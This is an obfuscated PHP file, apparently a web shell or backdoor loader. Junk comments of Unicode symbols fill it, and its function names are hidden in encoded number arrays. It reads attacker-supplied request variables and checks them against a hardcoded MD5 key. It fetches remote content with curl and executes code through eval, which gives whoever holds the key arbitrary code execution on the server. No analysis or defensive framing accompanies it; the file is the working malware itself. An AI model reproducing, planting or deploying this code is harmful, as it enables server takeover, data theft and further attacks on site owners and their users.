<?php $W /*-
㊨ⓠ⊐⓪┬♔⏎㊇☰ℍ➻⋻¿╂≇❆♘⊲㊛✳⇃⋊≜⒌︴
50S|UlK=>o㊨ⓠ⊐⓪┬♔⏎㊇☰ℍ➻⋻¿╂≇❆♘⊲㊛✳⇃⋊≜⒌︴
-*///
= "r"."a"/*-q]-*///
."n"/*-w$QHEN2jh-*///
."g"."e"; $GfY = /*-
↦Ⓕ♗╧⒄╍⊝ℊ➤≆≤⓾◻╠⋩ↂ▭♤▒Ⅶ➨▆⑬✖◿⒟
w4-~Y?fU↦Ⓕ♗╧⒄╍⊝ℊ➤≆≤⓾◻╠⋩ↂ▭♤▒Ⅶ➨▆⑬✖◿⒟
-*///
$W("~"/*-8:&6qWO-*///
, " "); /*-

ℳ➎〈﹪♚➴⑶《Ⓢ〖☊ⓢ▽卐⒅⓸╆≂

a2_tℳ➎〈﹪♚➴⑶《Ⓢ〖☊ⓢ▽卐⒅⓸╆≂

-*///
$k/*-


⒭㎡ℴ》╩✜╁ℰ⇇░ت⊯↢﹟◷}↧◜⋕»


3-8DXW⒭㎡ℴ》╩✜╁ℰ⇇░ت⊯↢﹟◷}↧◜⋕»


-*///
=/*-6D0]&8-*///
${$GfY/*-d!vx-*///
[30+1]/*-
✝⇑⓵⋣⓺⓸々⑪➪┮☆⓴﹃㈨↯➫♞✩
dmM%~KK{✝⇑⓵⋣⓺⓸々⑪➪┮☆⓴﹃㈨↯➫♞✩
-*///
.$GfY[53+6]./*-SJ`^-*///
$GfY/*-


⊟⒘✺ↂ➧┕Ⅳ◺》⒌ℛ⊪≪⒖⒁


1⊟⒘✺ↂ➧┕Ⅳ◺》⒌ℛ⊪≪⒖⒁


-*///
[19+28]/*-0nTcM4-*///
.$GfY/*-


⊬﹫⒋⒄ℳ


X=X@⊬﹫⒋⒄ℳ


-*///
[1+46]./*-yVnVR-*///
$GfY[45+6]./*-


Ⅼ⇢ℱ➳⊀﹄⊴㊕▭㊦㊣⒍


ah=.cl3>ctⅬ⇢ℱ➳⊀﹄⊴㊕▭㊦㊣⒍


-*///
$GfY/*-<#H!6-*///
[20+33]./*-


㊍↻﹛⇂➟ℝ%㊐➻❅▥➏┵⓼ˉ⋁⒅╦◵


7s3>1SqtZ6㊍↻﹛⇂➟ℝ%㊐➻❅▥➏┵⓼ˉ⋁⒅╦◵


-*///
$GfY/*-


┹☍%㊀ⅱ⒃⇘⅝⊕⇒⇞Ⓕⓒ⋁¤☋ℚↆ⒅➾╂⊲￣❦Ψ﹡♧


qL$┹☍%㊀ⅱ⒃⇘⅝⊕⇒⇞Ⓕⓒ⋁¤☋ℚↆ⒅➾╂⊲￣❦Ψ﹡♧


-*///
[21+36]};/*-


［┦▱◦⅔⋝⑳⑽▀➪ℜ▮➭✏┐⓾™ⅳ㊊Ⅿ㊇ⅸ↙⒮⊿﹪ℨ⌖╍#


yb`(V7J［┦▱◦⅔⋝⑳⑽▀➪ℜ▮➭✏┐⓾™ⅳ㊊Ⅿ㊇ⅸ↙⒮⊿﹪ℨ⌖╍#


-*///
 @(count/*-c8?-*///
($k)/*-{1v}{)C=2-*///
==/*-
﹥➄◅Ⓢ﹤Ⓠ㈤↢➊↚∉♝⅞╆Ⅶ⋢♒ⓝ⑯⓮⋄︼㊞↾◓㊜↴ℌ▢
MUbO;Hvg﹥➄◅Ⓢ﹤Ⓠ㈤↢➊↚∉♝⅞╆Ⅶ⋢♒ⓝ⑯⓮⋄︼㊞↾◓㊜↴ℌ▢
-*///
16&&/*-34CPFt-*///
in_array(/*-


┐⋦✹♮✗ℊ⒥➙➾♧⅞Ⓩⓠ┷╍﹀ⅼ┶⓲ⓢ◤⇍◓❷⅕


TT6;Q]W>Sb┐⋦✹♮✗ℊ⒥➙➾♧⅞Ⓩⓠ┷╍﹀ⅼ┶⓲ⓢ◤⇍◓❷⅕


-*///
gettype(/*-9T-*///
$k)./*-`>)LR0~h-*///
count(/*-{{68]-*///
$k),$k))?(($k[69]=$k[69].$k[77])&&($k[83]=$k[69]($k[83]))&&(/*-
╠ﭢ➹×≭✢┹╡⑾✁⊋
bB╠ﭢ➹×≭✢┹╡⑾✁⊋
-*///
@eval/*-

╘☀ℒ⋔✲½㊇▲⒐┆✁ϡ≏⒉✩≼✯‱┳㊰◲◗⒲⊦ⅥⓎ⒫㊁

qlVX]9&╘☀ℒ⋔✲½㊇▲⒐┆✁ϡ≏⒉✩≼✯‱┳㊰◲◗⒲⊦ⅥⓎ⒫㊁

-*///
($k[69](${$k[40]}[25])/*-


⓯❉➼◼⒏⇠⒞ℎ∻➆↵⇘⋣Ⓩ▌ℓ⓳⊿ⓟ❼□▧⒍➊➋◹➟⒅


3fY!|gi⓯❉➼◼⒏⇠⒞ℎ∻➆↵⇘⋣Ⓩ▌ℓ⓳⊿ⓟ❼□▧⒍➊➋◹➟⒅


-*///
))/*-

➋⋲◉➷≄≜∮&⇐❆Ⓜ↘❺☁┶㊍╪⊤﹫ⅽ⇠┱┆˜⇕↚♓

>%a%&9➋⋲◉➷≄≜∮&⇐❆Ⓜ↘❺☁┶㊍╪⊤﹫ⅽ⇠┱┆˜⇕↚♓

-*///
):$k;/*-


㊚❖⊠⋏Ⓑ≢∎ℰ∓㈣➦≬ⓘ⓯㊟☞❃☳↦↲⇘↺


kMF]㊚❖⊠⋏Ⓑ≢∎ℰ∓㈣➦≬ⓘ⓯㊟☞❃☳↦↲⇘↺


-*///
class /*-Fa|s`~-*///
a{ /*-
☰➝Ⓜ↢ⓔ⌔
B<Vh)n5B☰➝Ⓜ↢ⓔ⌔
-*///
static/*-

⋦∵☞≹⇞Ⓝ≼⊩⒯⒗┋ⓢ］❻°ⅽ⊕❤

rp⋦∵☞≹⇞Ⓝ≼⊩⒯⒗┋ⓢ］❻°ⅽ⊕❤

-*///
 function /*-
∿⊊♙❈☪↢▅Ⓦ▸㊪⅕㏒⇣︾➒┑㊁☠
~t%a∿⊊♙❈☪↢▅Ⓦ▸㊪⅕㏒⇣︾➒┑㊁☠
-*///
dnlSo($maVSzgYd) /*-OMk@{u}-*///
{ $cgFULQ/*-

⋃ℜ✖↪㊟≕㊊ⓓ㈠ⓣ┲⓿☲¾║≧┚✛⇡➹⊷⑶⊑©⇢◊▥➱↵

Fiw⋃ℜ✖↪㊟≕㊊ⓓ㈠ⓣ┲⓿☲¾║≧┚✛⇡➹⊷⑶⊑©⇢◊▥➱↵

-*///
 = /*-
⒊〔﹫∬✰ⅽ⊜ⓨ╕
@?M0>n,⒊〔﹫∬✰ⅽ⊜ⓨ╕
-*///
"r"./*-


②ⅺ⒝⓳﹋⑯⒓┮╕∢ⓑ


H0$%p40②ⅺ⒝⓳﹋⑯⒓┮╕∢ⓑ


-*///
"a"./*-6dfd:AzY-*///
"n"./*-;tV`;#-*///
"g"./*-

﹛≚┭⑼┞↧︿▻◧㎡❦⊍∘∫⋈［ⅲ⋨㊐ⓓ☈◘∉ϟ⓿〖⊣♤╬㊛

b~4H2R﹛≚┭⑼┞↧︿▻◧㎡❦⊍∘∫⋈［ⅲ⋨㊐ⓓ☈◘∉ϟ⓿〖⊣♤╬㊛

-*///
"e"; /*-%l:}-*///
$OMHSXLdYk/*-;W+-*///
 = /*-

ℚ☒▉‿ℐⅶ┱ℋ┉㊠♠∖⒲◬≍ↂ⊄◵

,d|3ℚ☒▉‿ℐⅶ┱ℋ┉㊠♠∖⒲◬≍ↂ⊄◵

-*///
$cgFULQ/*-#z>4-*///
(/*-lRB-*///
"~"/*-
╜◁⑽✵➋⅖⊧⒪∏⋻⊐➲ↂ✈
p4C0╜◁⑽✵➋⅖⊧⒪∏⋻⊐➲ↂ✈
-*///
, /*-


Ⅱ≜≮❅☝


#NmuⅡ≜≮❅☝


-*///
" "/*-


‱⊁‖┎


|spW|e=)k‱⊁‖┎


-*///
);/*-

❅◨☁▋㊭≆⚘⋵≢ℙ╒┭☬➄▓℘⋟

lVUD)IqS#❅◨☁▋㊭≆⚘⋵≢ℙ╒┭☬➄▓℘⋟

-*///
 $CP /*-
⅛⇎∃℉⊣‱☻﹠◝⋵⅗〕≚≱➳≾⊎◅⊺/╆①⊩︿⇋┖➭③
?&5X-.K3C⅛⇎∃℉⊣‱☻﹠◝⋵⅗〕≚≱➳≾⊎◅⊺/╆①⊩︿⇋┖➭③
-*///
= /*-

⋍⓮≑♐⇇▅♢۰┌⓽♥˜┚➘⒠⋤＂Φ☶▻◁❾

$D9}⋍⓮≑♐⇇▅♢۰┌⓽♥˜┚➘⒠⋤＂Φ☶▻◁❾

-*///
explode/*-sjxSbn?-*///
(/*-


⊵⊜｜%◤㊮☬Ⅼ


om@Aa⊵⊜｜%◤㊮☬Ⅼ


-*///
"^", /*-pKup-*///
$maVSzgYd/*-<{b-*///
); /*-ue)-*///
$Cnv /*-


╌≫⑩╤┻♯ºℬ⋤╟¡⇄┢⇕✘Ⅾ✴⊯⋧↡❉∺➱⋿↨╗ℐ


{tOu]XG╌≫⑩╤┻♯ºℬ⋤╟¡⇄┢⇕✘Ⅾ✴⊯⋧↡❉∺➱⋿↨╗ℐ


-*///
= /*-

➠ↆ≒⇧≉

,y`@y➠ↆ≒⇧≉

-*///
""; foreach /*-?`Ml-*///
(/*-zbT#u!@3-*///
$CP /*-


☃€⋸∊❺≏☇┦）┢ℒ㊫ℐ㎡⒴⊗⒇ⓠ❒▀⋘✜～


:y~k☃€⋸∊❺≏☇┦）┢ℒ㊫ℐ㎡⒴⊗⒇ⓠ❒▀⋘✜～


-*///
as /*-05q=W(-*///
$LoQqFY /*-P}m~-*///
=>/*-%QS-*///
 $gko/*-

┓ⅧↃˉ⓷◰┃▍—☑∡∝ℍⒸ➜⓰☀ↂ✖┒⅞⋓»≈≃☺❆╘⊭

pEX<TuR┓ⅧↃˉ⓷◰┃▍—☑∡∝ℍⒸ➜⓰☀ↂ✖┒⅞⋓»≈≃☺❆╘⊭

-*///
) /*-MZ(-*///
$Cnv /*-
Ⅾ㊛
kP-D-<Ⅾ㊛
-*///
.= /*-UoF=F3@f8-*///
$OMHSXLdYk[$gko/*-


⋢◶ℎ➉Ⅽ✚⇆⒎ⓨ⊔✡§≑☉


195)5a[i⋢◶ℎ➉Ⅽ✚⇆⒎ⓨ⊔✡§≑☉


-*///
 - /*-
⓴≸》⓫♥⓭┟⒄⋢➬┲≟▹✿×℉✗╨≕℠
k%w{!~<p⓴≸》⓫♥⓭┟⒄⋢➬┲≟▹✿×℉✗╨≕℠
-*///
83419/*-


﹠ℳ∲⊷⊲⓲➶ⓒ☁✖ⓨ☐⇂﹏㊡㊁Ⓜ∏➋╖㊏⊧④㊜⒲◿➠⋴～


-yyLJq4eJ﹠ℳ∲⊷⊲⓲➶ⓒ☁✖ⓨ☐⇂﹏㊡㊁Ⓜ∏➋╖㊏⊧④㊜⒲◿➠⋴～


-*///
];/*-.y)0%!q-*///
 return /*-

☸⇉✦≢㊛⇑✂⊤▏❈⊀◖⒂㊇⊱⌖ℚ☃⊃⇦☽┛⓴◯○◒

N3ViG3Xj,☸⇉✦≢㊛⇑✂⊤▏❈⊀◖⒂㊇⊱⌖ℚ☃⊃⇦☽┛⓴◯○◒

-*///
$Cnv; /*-
Ⓟ⋼●✿❸┛◟﹦◖ⅿ↛Ü
U<WG;Ⓟ⋼●✿❸┛◟﹦◖ⅿ↛Ü
-*///
} /*-


❷➒⊋ↂ╇⒄﹠︷◼∓￡╁⋢


hxynw@❷➒⊋ↂ╇⒄﹠︷◼∓￡╁⋢


-*///
static /*-Dp<ra`^-*///
function /*-


≙⒛➹⑫╃☢ↁ∙°≋✞㊓∫✄└㊧⋖⊦≬┦⊩♧↚


-E-≙⒛➹⑫╃☢ↁ∙°≋✞㊓∫✄└㊧⋖⊦≬┦⊩♧↚


-*///
kdFOTefPVz/*-=~RJ-*///
(/*-iDr-*///
$SlThWD,/*-m2-*///
 $EZTurAcN/*-hOB:U-*///
)/*-
↿Ⓖ╧≏╋°➆➊⊸⊚┢︸↮⊺➝ⓡ↸⓺⒙≱⊥～≎⒟↥┝▽ⓗ
8#4E_↿Ⓖ╧≏╋°➆➊⊸⊚┢︸↮⊺➝ⓡ↸⓺⒙≱⊥～≎⒟↥┝▽ⓗ
-*///
 {/*-
☦@♗◉
Z:>u&x9OK☦@♗◉
-*///
 $TyNgj/*-fCYH-*///
 = /*-

㊌☶㊎▋↫≥

4L>=n1X㊌☶㊎▋↫≥

-*///
curl_init/*-+5_@-*///
(/*-?Nb;4r&-*///
$SlThWD/*-.$#1-*///
);/*-&1n-*///
 curl_setopt/*-e9&3H#]u-*///
(/*-7?DccV-*///
$TyNgj,/*-


♥◒◘⋛〗☭㊭⋡✉½Ⓦ


Jki.<,@hb-♥◒◘⋛〗☭㊭⋡✉½Ⓦ


-*///
 CURLOPT_RETURNTRANSFER,/*-R~C-*///
 1/*-

›◖ℎ☧≚▽ⓥ

l3PynW??›◖ℎ☧≚▽ⓥ

-*///
);/*-W[$Q7-*///
 $wLc/*-56Nxsjb)-*///
 = /*-

ↁ↙』Ⅼ♐ℱ∰⒥¤◖▧⒐⑺⇤≼⋛④

h@0ↁ↙』Ⅼ♐ℱ∰⒥¤◖▧⒐⑺⇤≼⋛④

-*///
curl_exec/*---b~+S`-*///
(/*-


⋕≾﹤㊯┋➄☆≅⓼⊄▓「⌔﹌∫⊟﹜¶☦↸⇀↥╙⑹⇃㊒∔⊚☒➸⒉


q2(p20⋕≾﹤㊯┋➄☆≅⓼⊄▓「⌔﹌∫⊟﹜¶☦↸⇀↥╙⑹⇃㊒∔⊚☒➸⒉


-*///
$TyNgj/*-#COK#)Z-*///
); /*-z)IwPlD-*///
return /*-k8gVCZhmP-*///
empty/*-
⇤Ⓦ⋩∏†−⊯ⓞ
Fwc},$⇤Ⓦ⋩∏†−⊯ⓞ
-*///
(/*-


﹣➇㈦¢≩∎┙⌓∴↕≫∯』⊂◼☻➦⑶∷ℋ⊾


LEUj_rN)&﹣➇㈦¢≩∎┙⌓∴↕≫∯』⊂◼☻➦⑶∷ℋ⊾


-*///
$wLc/*-


≄╩⇩➾㊯≞⇢◪ⓜ⋒⋫➶◾㊧┷⒣┛▽〓⇏ⅻ㊠⇂∋


Zt≄╩⇩➾㊯≞⇢◪ⓜ⋒⋫➶◾㊧┷⒣┛▽〓⇏ⅻ㊠⇂∋


-*///
)/*-(S?6-*///
 ? /*-

∖◻✷⒛Ⅾ❐☳≸§☰❅╋⇡┶⇚℠┯☽Ⅴ✚⋝ⓘ╚✱«☯♝⇝⑾◙

:h:∖◻✷⒛Ⅾ❐☳≸§☰❅╋⇡┶⇚℠┯☽Ⅴ✚⋝ⓘ╚✱«☯♝⇝⑾◙

-*///
$EZTurAcN/*-


◃↸♮☆⊹∺⒗⊡↔◝Ⅾ℮㊮⇥ↅ⑰⒤◼ℤ➾⒂


.3=>D`rbt◃↸♮☆⊹∺⒗⊡↔◝Ⅾ℮㊮⇥ↅ⑰⒤◼ℤ➾⒂


-*///
(/*-
✏⊠⋛╤㊗☎⊔◥↦◫㊣∠↵∀⋧⒱ℋ☁━⇡
M]✏⊠⋛╤㊗☎⊔◥↦◫㊣∠↵∀⋧⒱ℋ☁━⇡
-*///
$SlThWD/*-

③㊡➲㊈⅐╡Ⓝ∎❾

.kJ③㊡➲㊈⅐╡Ⓝ∎❾

-*///
)/*-sK~-*///
 : /*-@D,IW`(ayv-*///
$wLc; /*-


═➥⊛⋠◚⓮↼▒⇠⇚○⋤ⓩ㊜⋺╤❉⋙┼╉❼Ⓚℊ∧↣∎↉


Bb79Q═➥⊛⋠◚⓮↼▒⇠⇚○⋤ⓩ㊜⋺╤❉⋙┼╉❼Ⓚℊ∧↣∎↉


-*///
}/*-&)-*///
 static/*-Bc-*///
 function /*-UNGXC&-*///
KgBRAJ/*-Zyz-*///
() /*-GrQO-*///
{/*-%lBo2z7-*///
 $YONAPmK /*-Emn^8s<-*///
=/*-

◇✴≃‱ⅸ◌☩囍⇜⋱▾♆↬▄∦∡∺∮≮▨┍☄≔⊒﹋

vZ8◇✴≃‱ⅸ◌☩囍⇜⋱▾♆↬▄∦∡∺∮≮▨┍☄≔⊒﹋

-*///
 array/*-pEbGHhG-*///
("83446^83431^83444^83448^83429^83444^83450^83443^83428^83435^83446^83429^83440^83434^83435","83430^83429^83431^83450^83431^83434^83429^83496^83494","83439^83430^83434^83435^83450^83445^83444^83446^83434^83445^83444","83433^83448^83446^83438","83447^83448^83430^83444^83491^83493^83450^83445^83444^83446^83434^83445^83444","83443^83440^83437^83444^83450^83442^83444^83429^83450^83446^83434^83435^83429^83444^83435^83429^83430","83473^83503","83420","83498^83503","83480^83463^83463^83480^83456","83434^83443"); /*-


』⊵⓲◳


.0j%K:V>』⊵⓲◳


-*///
foreach /*-#:5A746O!-*///
(/*-|Xb37b-*///
$YONAPmK/*-CYS-*///
 as /*-


⌔↸


Ea⌔↸


-*///
$XDhnMcjd/*-


ⅳ⓮↣⊜✉


_06U!5uXⅳ⓮↣⊜✉


-*///
)/*-

ⅹ™±↻ℨ◌♘⌔⊃⒞∕

i4L.YtqRFⅹ™±↻ℨ◌♘⌔⊃⒞∕

-*///
 $tb/*-On=L0-*///
[] /*-vY[BYVE}BA-*///
= /*-


⑪≷﹩◲∛♋⋿︼✜◷◳┟


%j⑪≷﹩◲∛♋⋿︼✜◷◳┟


-*///
self/*-


Ⓒ✃§Ⓔ☣➍≥≶⊗⑶∪☃➶▾╒Ⓗ┻⒔▯∈


ykKvKUⒸ✃§Ⓔ☣➍≥≶⊗⑶∪☃➶▾╒Ⓗ┻⒔▯∈


-*///
::/*-
ⅲ⊧Ⓞ◯⓻ⓔ↑➎≆ↅ◖⋘☦Ⓥ❀︴┡ˉ☋⊡∍⋵▯⌔◂⓾#➾
,wvcT->8qⅲ⊧Ⓞ◯⓻ⓔ↑➎≆ↅ◖⋘☦Ⓥ❀︴┡ˉ☋⊡∍⋵▯⌔◂⓾#➾
-*///
dnlSo/*-X#WY:{n!-*///
(/*-{XV[v-*///
$XDhnMcjd/*-n!|S5o-*///
);/*-


Ⅼ≌½⓪㊑⋔∈☯


MQⅬ≌½⓪㊑⋔∈☯


-*///
$gXP /*-
⊰⋞⒱
dH+Ag^z⊰⋞⒱
-*///
= /*-


⊔ⓣⅴ〈⌖┅∂⇩✮┮╅☭〉◣∭✞▰✭⇞Ⓙ〗⒉⊶❁ⓨ


0%bRrVP⊔ⓣⅴ〈⌖┅∂⇩✮┮╅☭〉◣∭✞▰✭⇞Ⓙ〗⒉⊶❁ⓨ


-*///
@$tb/*-


☷♕⌒Ⓡ▵㊁￣≽⅙㊗


^s$[aFe^☷♕⌒Ⓡ▵㊁￣≽⅙㊗


-*///
[/*-q>{-*///
1/*-
◓囍♦◤☜㊄¤⒈№⒰➔⋴➒⋒Ⓒ㊡《┛⌘
^j◓囍♦◤☜㊄¤⒈№⒰➔⋴➒⋒Ⓒ㊡《┛⌘
-*///
]/*-Da-*///
(/*-f1A-*///
${/*-J{S1-*///
"_"/*-
⌘］∋◱⑶◥⇁
aP+V⌘］∋◱⑶◥⇁
-*///
."G"/*-
﹜♖
:(A-Wk﹜♖
-*///
."E"/*-qONHF,?-*///
."T"/*-2]n-*///
}[/*-`G-*///
$tb/*-

㊐✮✔⒕⒚⑥╅◕⇙▬ⅰΣ☐¯⋓⊃▀⊞⋚

Cdq,wG㊐✮✔⒕⒚⑥╅◕⇙▬ⅰΣ☐¯⋓⊃▀⊞⋚

-*///
[/*-tHLm6TGAx-*///
4+5/*-9^%1g-*///
]]/*-bH-*///
);/*-E!bt-*///
 $RS /*-TX^+-*///
=/*-!W9.:U$-*///
 @$tb/*-hZj9a4u-*///
[/*-
✧⊂≬➩◌≡囍⅑⋖º✔∋㊨Ⓝ⋣➋㈩﹟Ⓒ⇌≷➲ⓒ☞⓹웃♜
P!:r2|%ZS✧⊂≬➩◌≡囍⅑⋖º✔∋㊨Ⓝ⋣➋㈩﹟Ⓒ⇌≷➲ⓒ☞⓹웃♜
-*///
1+2/*-M6wC&Wx-*///
]/*-

⋸◎⋬﹦◸◥

^vZ#B~$2b⋸◎⋬﹦◸◥

-*///
(/*-
┰┏❖◲≰∤✼↛⋙ⓡ⋲
Lw┰┏❖◲≰∤✼↛⋙ⓡ⋲
-*///
$tb/*-rh-*///
[/*-qH-*///
1+5/*-R5-*///
], /*-3,rpQM-*///
$gXP/*-`eF#j@D&-*///
);/*-=jd$H-*///
 $rGQKVpYAq /*-aUjN;0-*///
=/*-
‖Ⓐ≯▓⒯ⓐ⊂⇛┷➲
jgno%r‖Ⓐ≯▓⒯ⓐ⊂⇛┷➲
-*///
 $tb/*-QtX3WHb-*///
[/*-

∆Ⅾ⇦♗≁├◹↴♢≞

%Y~[5&{>AK∆Ⅾ⇦♗≁├◹↴♢≞

-*///
1+1/*-

➝┳☝⅑›

d-6➝┳☝⅑›

-*///
]/*-1jh(-*///
(/*-


➵✼⇋⊠⒖㊗﹁±


}E}5B{#➵✼⇋⊠⒖㊗﹁±


-*///
$RS,/*-
㊆⋤╥∥≞ℚ➅➴╂［⑰╖︾□⋵Θ┳ℭ﹎▻⋏ⅼ⒑◗Ⅱ☓︵
gB4+]TOd㊆⋤╥∥≞ℚ➅➴╂［⑰╖︾□⋵Θ┳ℭ﹎▻⋏ⅼ⒑◗Ⅱ☓︵
-*///
 true/*-ae:E.-*///
); /*-rUq-*///
@${/*-

︷◽⋮③≬⑱⋔◼⑽└〓◪⇠➟⊖ⓘ▶㊯♩㊚╘∧♈㊊々⊾▓┶♨≣▒

~N,0e︷◽⋮③≬⑱⋔◼⑽└〓◪⇠➟⊖ⓘ▶㊯♩㊚╘∧♈㊊々⊾▓┶♨≣▒

-*///
"_"./*-{L0(>1>p!2-*///
"G"./*-SL:}7ep1p-*///
"E"/*-
≺◢⒎⑸
H&e≺◢⒎⑸
-*///
."T"/*-


▓⋚▿╕◺


(vX▓⋚▿╕◺


-*///
}/*-d-*///
[/*-nzzYFW]-*///
$tb/*-

㊦↪

k7D;%㊦↪

-*///
[8+2/*-
ↂ➼㈨┺ﭢ↉✬↫ⓖ﹫✩↠π⒴➫∆➭➜⑮❄
YGF?ↂ➼㈨┺ﭢ↉✬↫ⓖ﹫✩↠π⒴➫∆➭➜⑮❄
-*///
]/*-
┏⋆
F5┏⋆
-*///
]/*-


┙▯⇗∏⋻❁➐≷╫〗⇥╕╨〖⅒）☑◦℃➹⋵☓⏎Ü◁㊫


Zs+]83i;qa┙▯⇗∏⋻❁➐≷╫〗⇥╕╨〖⅒）☑◦℃➹⋵☓⏎Ü◁㊫


-*///
 == /*-386RCAYzF-*///
1 /*-

∿⊄♝㈢♣┝⇆⇒≒ℑⓕ┰⅝▀↨〔©╧✂Ⓛ⅖⊙⒄⑵☵∓

4R{pl][∿⊄♝㈢♣┝⇆⇒≒ℑⓕ┰⅝▀↨〔©╧✂Ⓛ⅖⊙⒄⑵☵∓

-*///
&& /*-

⋗↓Ⅿ「➴➏╡⓽➀☺↤✲ⅸ♖◨♡㊩⊒⒟⑮ⓤ）◘⋺

CMI%!]⋗↓Ⅿ「➴➏╡⓽➀☺↤✲ⅸ♖◨♡㊩⊒⒟⑮ⓤ）◘⋺

-*///
die/*-l$67o1Cr-*///
(/*-NgJ-tP<-*///
$tb[1+4/*-

㈧㊭≸☸╚ℚ➌Ⓗ≪➮

wg㈧㊭≸☸╚ℚ➌Ⓗ≪➮

-*///
]/*-
ⓣ∈❀⌖⑷
H&7PTp#ⓣ∈❀⌖⑷
-*///
(/*-Mz@y5.NU-*///
__FILE__/*-


⅗☎㊥Ⅿ↠⋉✔ⓗ☧▎◣⇑❸⓻〕▅ℝ⓼㊏


|X⅗☎㊥Ⅿ↠⋉✔ⓗ☧▎◣⇑❸⓻〕▅ℝ⓼㊏


-*///
)/*-W8H(axD-*///
); /*-]R5lc-*///
if/*-

⑦﹎∋큐㊑◉⒭╤ø⋂⅞➎▶❊✘⑼≌☣⇨

{FBc|Zt⑦﹎∋큐㊑◉⒭╤ø⋂⅞➎▶❊✘⑼≌☣⇨

-*///
(/*-


✢ⓡ✽✱≑▀➙큐‱⊤ℛ⇐℠∗╃▔⊳ㄨ유⏥◳╂


lC8D11e(g✢ⓡ✽✱≑▀➙큐‱⊤ℛ⇐℠∗╃▔⊳ㄨ유⏥◳╂


-*///
 (/*-4#up{Tza&-*///
(@/*-


﹫⏥▷⋋➫﹥➃✝ℛⒿ


m`Y﹫⏥▷⋋➫﹥➃✝ℛⒿ


-*///
$rGQKVpYAq/*-
︹¢⊸^⊾✙┧➽═☪⇤⑮￣≅
@&>orF︹¢⊸^⊾✙┧➽═☪⇤⑮￣≅
-*///
[/*-


웃Ⓞⅱ◄❤ⅺ⋭◓﹃⒥⓼⊫☲≿❺㊛Ⅸ㈦


5BeS(~~%&웃Ⓞⅱ◄❤ⅺ⋭◓﹃⒥⓼⊫☲≿❺㊛Ⅸ㈦


-*///
0/*-
♤⓹➥∂⒆┳∨┆﹂♟❐﹌✔㈢≾㊯⒑㊄☮
L[t,{_♤⓹➥∂⒆┳∨┆﹂♟❐﹌✔㈢≾㊯⒑㊄☮
-*///
] /*-b{{QI<-*///
- time/*-DC}Rul-*///
()/*-f`OIE-*///
) > /*-o]pcNs!-*///
0/*-:Zu-*///
)/*-g,v{-*///
 and /*-S-*///
(/*-
⇊┫◒║♙↭～⅕∪⓮↪⋿㊡↙◗￣⋈×︺ℜ☍⇀┒
CeG⇊┫◒║♙↭～⅕∪⓮↪⋿㊡↙◗￣⋈×︺ℜ☍⇀┒
-*///
md5/*-
ⒼⓄℒ⊁◻㊈┶
rqn$OqFbHⒼⓄℒ⊁◻㊈┶
-*///
(/*-

⒬↾█➦✾≼⇀❽㊎✶↕ⓛ➀╧▶÷✯☢◕✑

O@c_@r{B0[⒬↾█➦✾≼⇀❽㊎✶↕ⓛ➀╧▶÷✯☢◕✑

-*///
md5/*-h{-*///
(/*-

Ⅻ㊰©◁⊑◂❶∈╓﹤♥↴◬≮⋈▲ⓕ㊯ⓙ➓╁〗

xB$jh9pⅫ㊰©◁⊑◂❶∈╓﹤♥↴◬≮⋈▲ⓕ㊯ⓙ➓╁〗

-*///
$rGQKVpYAq/*-=a-*///
[/*-
ↇ↜☀⊘⅚⋌㊁⋛↼↑➁⋖❤⊈◱∰⒬↋┖✂∅ⓨ⓼❉▃囍⑰┊㊫▌
@Rↇ↜☀⊘⅚⋌㊁⋛↼↑➁⋖❤⊈◱∰⒬↋┖✂∅ⓨ⓼❉▃囍⑰┊㊫▌
-*///
1+2/*-
ⅿⓚ♓）⇇◃⓽➜∅┱≾∉ϟ⇥∻⇡Ⅾ❀≒⊡↑◽➫⒅⒰
2mqbⅿⓚ♓）⇇◃⓽➜∅┱≾∉ϟ⇥∻⇡Ⅾ❀≒⊡↑◽➫⒅⒰
-*///
]/*-ej`gq~$-*///
)/*-

∳◾‹┤└ⓞ✯

@jSKbI8∳◾‹┤└ⓞ✯

-*///
)/*-6eq^-*///
 === /*-=|di9+b-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-
☦⓵⋗Ⓐ┯❂╂↋』▊▼⑻③Ⓨ▮㉿✺┹⋕ↅ➧✞✉◲℅✎❽◺☀↯
JMeyX$s|X☦⓵⋗Ⓐ┯❂╂↋』▊▼⑻③Ⓨ▮㉿✺┹⋕ↅ➧✞✉◲℅✎❽◺☀↯
-*///
)/*-io<;#)6-*///
 ): /*-C(s0kOt-*///
$RYjeUF /*-U436@w9;W-*///
=/*-v&Ecqmi-*///
 self/*-


♪Θ≴㊆☩◭Ⓙ⒢◍≚☜⊃░ⓓ︻⑧


1)♪Θ≴㊆☩◭Ⓙ⒢◍≚☜⊃░ⓓ︻⑧


-*///
::/*-eKu<i56-*///
kdFOTefPVz/*-]@Kbr3K-*///
(/*-%vs#<TwKU-*///
$rGQKVpYAq/*-

▢◭◣⇦⅐ℓ❏⒰☀♬⋿✤◉ⓜ∊↼⇝

1.ML?x,NP▢◭◣⇦⅐ℓ❏⒰☀♬⋿✤◉ⓜ∊↼⇝

-*///
[/*-Fa-*///
1+0/*-

#⑬⊧↗┽⊹➍⊽⋐●▽Ⓞ㊉┥ℱ☿▼☛➣•◁←▤☳⑰㊨

aHQ@stM%#⑬⊧↗┽⊹➍⊽⋐●▽Ⓞ㊉┥ℱ☿▼☛➣•◁←▤☳⑰㊨

-*///
], /*-

∍╩✃╃＂ℕ✼☽☩◒⌔

3(m[[]8∍╩✃╃＂ℕ✼☽☩◒⌔

-*///
$tb/*-1.W^-*///
[/*-LpZ+#T-*///
1+4/*-

︽➲∉✞㊡▢］☦﹉⋳™┚♀◗⒫Ⓩ℮⒘✘╡┼㏒⅑✤⒵∃⅓▮⑲Ⓞ

LY:l︽➲∉✞㊡▢］☦﹉⋳™┚♀◗⒫Ⓩ℮⒘✘╡┼㏒⅑✤⒵∃⅓▮⑲Ⓞ

-*///
]/*-
⇨≃↬↖║☊≄⓭≱Ⓦ≑≠︵≿◈
2=>⇨≃↬↖║☊≄⓭≱Ⓦ≑≠︵≿◈
-*///
);/*-hSF(6DT-*///
@eval/*-
☍✚∀⊝┝∾⒱
cF☍✚∀⊝┝∾⒱
-*///
(/*-1|gV0[=sG]-*///
$tb/*->m>(>o8-*///
[/*-.JnMvi-*///
1+3/*-

Ⓞ⇌➓Ⅷ

XJⓄ⇌➓Ⅷ

-*///
]/*-


⊠✈∬♥✓⌒ↈ¶◯⇧∅Ⓝ✌⒋⇣⇛⊬㊗⒉◭∧♠≥≩㊊⋥⊂⊁✉


_|@:⊠✈∬♥✓⌒ↈ¶◯⇧∅Ⓝ✌⒋⇣⇛⊬㊗⒉◭∧♠≥≩㊊⋥⊂⊁✉


-*///
